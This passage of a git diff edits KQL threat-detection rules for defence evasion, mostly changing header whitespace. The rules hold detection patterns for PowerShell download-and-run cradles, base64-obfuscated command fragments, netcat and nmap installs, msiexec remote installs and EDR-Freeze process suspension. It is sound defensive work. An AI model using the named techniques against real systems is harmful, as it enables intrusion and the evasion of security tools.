"\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql index c104c74f..0d13b60e 100644 --- a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql +++ b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Msiexec Execute Arbitrary DLL -// Author: frack113 -// Date: 2022-01-16 -// Level: medium -// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. -// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.007 -// False Positives: -// - Legitimate script - -DeviceProcessEvents +// Title: Suspicious Msiexec Execute Arbitrary DLL +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. +// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 +// False Positives: +// - Legitimate script + +DeviceProcessEvents | where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y" or ProcessCommandLine contains " –y" or ProcessCommandLine contains " —y" or ProcessCommandLine contains " ―y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql index 03997270..4e2b3576 100644 --- a/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql +++ b/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Msiexec Quiet Install From Remote Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-28 -// Level: medium -// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.007 - -DeviceProcessEvents +// Title: Suspicious Msiexec Quiet Install From Remote Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-28 +// Level: medium +// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "\\AppData\\Local\\Temp\\OpenOffice" and ProcessCommandLine contains "Installation Files\\openoffice"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql b/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql index e0654e90..4fe0bd62 100644 --- a/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql +++ b/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Network Connection Binary No CommandLine -// Author: Florian Roth (Nextron Systems) -// Date: 2022-07-03 -// Level: high -// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceNetworkEvents +// Title: Suspicious Network Connection Binary No CommandLine +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceNetworkEvents | where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql b/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql index 5e6427e8..7783b72a 100644 --- a/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql +++ b/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Obfuscated PowerShell Code -// Author: Florian Roth (Nextron Systems) -// Date: 2022-07-11 -// Level: high -// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious Obfuscated PowerShell Code +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-11 +// Level: high +// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql b/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql index 475dce6c..fb7f4e3a 100644 --- a/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql +++ b/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Package Installed - Linux -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-03 -// Level: medium -// Description: Detects installation of suspicious packages using system installation utilities -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553.004 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Suspicious Package Installed - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-03 +// Level: medium +// Description: Detects installation of suspicious packages using system installation utilities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql b/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql index fd23deca..382f4dff 100644 --- a/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Parent Double Extension File Execution -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-06 -// Level: high -// Description: Detect execution of suspicious double extension files in ParentCommandLine -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.007 - -DeviceProcessEvents +// Title: Suspicious Parent Double Extension File Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-06 +// Level: high +// Description: Detect execution of suspicious double extension files in ParentCommandLine +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.007 + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql index d896dce7..b539e5e4 100644 --- a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql +++ b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Path In Keyboard Layout IME File Registry Value -// Author: X__Junior (Nextron Systems) -// Date: 2023-11-21 -// Level: high -// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. -// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. -// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Suspicious Path In Keyboard Layout IME File Registry Value +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-21 +// Level: high +// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. +// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. +// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql b/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql index 369e2266..9498dc5e 100644 --- a/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql +++ b/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Ping/Del Command Combination -// Author: Ilya Krestinichev -// Date: 2022-11-03 -// Level: high -// Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 - -DeviceProcessEvents +// Title: Suspicious Ping/Del Command Combination +// Author: Ilya Krestinichev +// Date: 2022-11-03 +// Level: high +// Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "del ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q " or ProcessCommandLine contains " –q " or ProcessCommandLine contains " —q " or ProcessCommandLine contains " ―q ") and ProcessCommandLine contains "Nul" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql b/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql index 510eb368..b47137d6 100644 --- a/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql +++ b/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Powercfg Execution To Change Lock Screen Timeout -// Author: frack113 -// Date: 2022-11-18 -// Level: medium -// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious Powercfg Execution To Change Lock Screen Timeout +// Author: frack113 +// Date: 2022-11-18 +// Level: medium +// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql b/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql index 17892898..821b70f6 100644 --- a/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql +++ b/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql @@ -1,10 +1,10 @@ -// Title: Suspicious PowerShell Invocations - Specific - ProcessCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-05 -// Level: medium -// Description: Detects suspicious PowerShell invocation command parameters -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious PowerShell Invocations - Specific - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-05 +// Level: medium +// Description: Detects suspicious PowerShell invocation command parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql index 1d716247..bca7f601 100644 --- a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Process Masquerading As SvcHost.EXE -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-08-07 -// Level: high -// Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. -// Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious Process Masquerading As SvcHost.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-08-07 +// Level: high +// Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. +// Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\svchost.exe" and (not(((FolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) or ProcessVersionInfoOriginalFileName =~ "svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_parents.kql b/KQL/rules/Defense Evasion/suspicious_process_parents.kql index 1eca60d2..0ec096c9 100644 --- a/KQL/rules/Defense Evasion/suspicious_process_parents.kql +++ b/KQL/rules/Defense Evasion/suspicious_process_parents.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Process Parents -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-21 -// Level: high -// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Suspicious Process Parents +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-21 +// Level: high +// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql b/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql index 22adc778..78980468 100644 --- a/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql +++ b/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Process Start Locations -// Author: juju4, Jonhnathan Ribeiro, oscd.community -// Date: 2019-01-16 -// Level: medium -// Description: Detects suspicious process run from unusual locations -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, car.2013-05-002 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Suspicious Process Start Locations +// Author: juju4, Jonhnathan Ribeiro, oscd.community +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious process run from unusual locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, car.2013-05-002 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql index 9a592f94..966b5909 100644 --- a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql +++ b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Process Suspension via WERFaultSecure through EDR-Freeze -// Author: Jason (https://github.com/0xbcf) -// Date: 2025-09-23 -// Level: high -// Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate usage of WerFaultSecure for debugging purposes - -DeviceProcessEvents +// Title: Suspicious Process Suspension via WERFaultSecure through EDR-Freeze +// Author: Jason (https://github.com/0xbcf) +// Date: 2025-09-23 +// Level: high +// Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate usage of WerFaultSecure for debugging purposes + +DeviceProcessEvents | where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql index a85047d3..f299a847 100644 --- a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql +++ b/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql @@ -1,13 +1,13 @@ -// Title: Suspicious PROCEXP152.sys File Created In TMP -// Author: xknow (@xknow_infosec), xorxes (@xor_xes) -// Date: 2019-04-08 -// Level: medium -// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. -// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. -// MITRE Tactic: Defense Evasion -// Tags: attack.t1562.001, attack.defense-evasion -// False Positives: -// - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it. - -DeviceFileEvents +// Title: Suspicious PROCEXP152.sys File Created In TMP +// Author: xknow (@xknow_infosec), xorxes (@xor_xes) +// Date: 2019-04-08 +// Level: medium +// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. +// This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1562.001, attack.defense-evasion +// False Positives: +// - Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on 